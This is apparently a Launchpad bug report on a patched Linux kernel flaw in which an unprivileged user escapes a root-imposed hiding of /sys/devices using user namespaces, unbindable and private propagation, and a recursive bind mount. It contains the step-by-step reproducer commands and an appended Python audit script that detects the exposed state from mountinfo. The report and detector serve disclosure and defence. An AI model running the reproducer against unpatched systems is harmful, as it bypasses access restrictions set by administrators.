** Tags added: cscc

https://bugs.launchpad.net/bugs/1789161

Title:
  Bypass of mount visibility through userns + mount propagation

Status in linux package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  Fix Released
Status in linux source package in Disco:
  Fix Released

Bug description:
  [Impact]

  Jonathan Calmels from NVIDIA reported that he's able to bypass the
  mount visibility security check in place in the Linux kernel by using
  a combination of the unbindable property along with the private mount
  propagation option to allow an unprivileged user to see a path which
  was purposefully hidden by the root user.

  [Test Case]

  Reproducer:
  # Hide a path from all users using a tmpfs
  root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
  root@castiana:~#

  # As an unprivileged user, unshare user namespace and mount namespace
  stgraber@castiana:~$ unshare -U -m -r

  # Confirm the path is still not accessible
  root@castiana:~# ls /sys/devices/

  # Make /sys recursively unbindable and private
  root@castiana:~# mount --make-runbindable /sys
  root@castiana:~# mount --make-private /sys

  # Recursively bind-mount the rest of /sys over to /mnt
  root@castiana:~# mount --rbind /sys/ /mnt

  # Access our hidden /sys/devices as an unprivileged user
  root@castiana:~# ls /mnt/devices/
  breakpoint  cpu  cstate_core  cstate_pkg  i915  intel_pt  isa  kprobe
  LNXSYSTM:00  msr  pci0000:00  platform  pnp0  power  software  system
  tracepoint  uncore_arb  uncore_cbox_0  uncore_cbox_1  uprobe  virtual

  [Regression Potential]

  Low. The fixes are relatively simple. Regressions would most likely be
  specific to software utilizing user namespaces + mount propagation
  which is a small (but often important) portion of the Ubuntu archive.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+subscriptions
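
Added example, not part of the bug report or of the kernel fix: an audit check over /proc/<pid>/mountinfo that reports a directory which is covered by an overmount in one mount of a filesystem but reachable uncovered through another mount of the same filesystem, which is the end state of the reproducer above. The sample lines, the Mount record and the function names are constructed for this example; the check generalizes from sysfs to any filesystem, and it cannot tell whether an uncovered directory is merely an empty mount point.

```python
import posixpath
from collections import namedtuple

Mount = namedtuple("Mount", "id parent dev root point fstype")

# Constructed /proc/<pid>/mountinfo lines (IDs, devices, options illustrative):
# the state inside the unprivileged namespace after the reproducer's rbind.
SAMPLE = """\
309 308 8:2 / / rw,relatime - ext4 /dev/sda2 rw
310 309 0:21 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw
311 310 0:52 / /sys/devices rw,relatime unbindable - tmpfs tmpfs rw
312 309 0:21 / /mnt rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw
"""

def parse_mountinfo(text):
    mounts = []
    for fields in (line.split() for line in text.splitlines() if line.strip()):
        sep = fields.index("-")  # optional fields (shared:N, unbindable) end here
        mounts.append(Mount(*fields[:5], fields[sep + 1]))
    return mounts

def inside(path, base):
    return path == base or path.startswith(base.rstrip("/") + "/")

def exposed_paths(text):
    """Return (path, fstype) where a directory covered in one mount of a
    filesystem is reachable, uncovered, through another mount of it."""
    mounts = parse_mountinfo(text)
    by_id = {m.id: m for m in mounts}
    covered, tops = set(), set()
    for child in mounts:
        parent = by_id.get(child.parent)
        if parent and child.dev != parent.dev and inside(child.point, parent.point):
            rel = posixpath.relpath(child.point, parent.point)
            covered.add((parent.dev, posixpath.normpath(posixpath.join(parent.root, rel))))
            tops.add((parent.id, child.point))
    found = []
    for m in mounts:
        for dev, path in sorted(covered):
            if dev != m.dev or path == m.root or not inside(path, m.root):
                continue
            seen_at = posixpath.normpath(
                posixpath.join(m.point, posixpath.relpath(path, m.root)))
            if (m.id, seen_at) not in tops:  # nothing mounted over it here
                found.append((seen_at, m.fstype))
    return found

if __name__ == "__main__":
    print(exposed_paths(SAMPLE))
```

To audit a live process, pass the contents of /proc/<pid>/mountinfo for a process inside the namespace of interest instead of SAMPLE.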
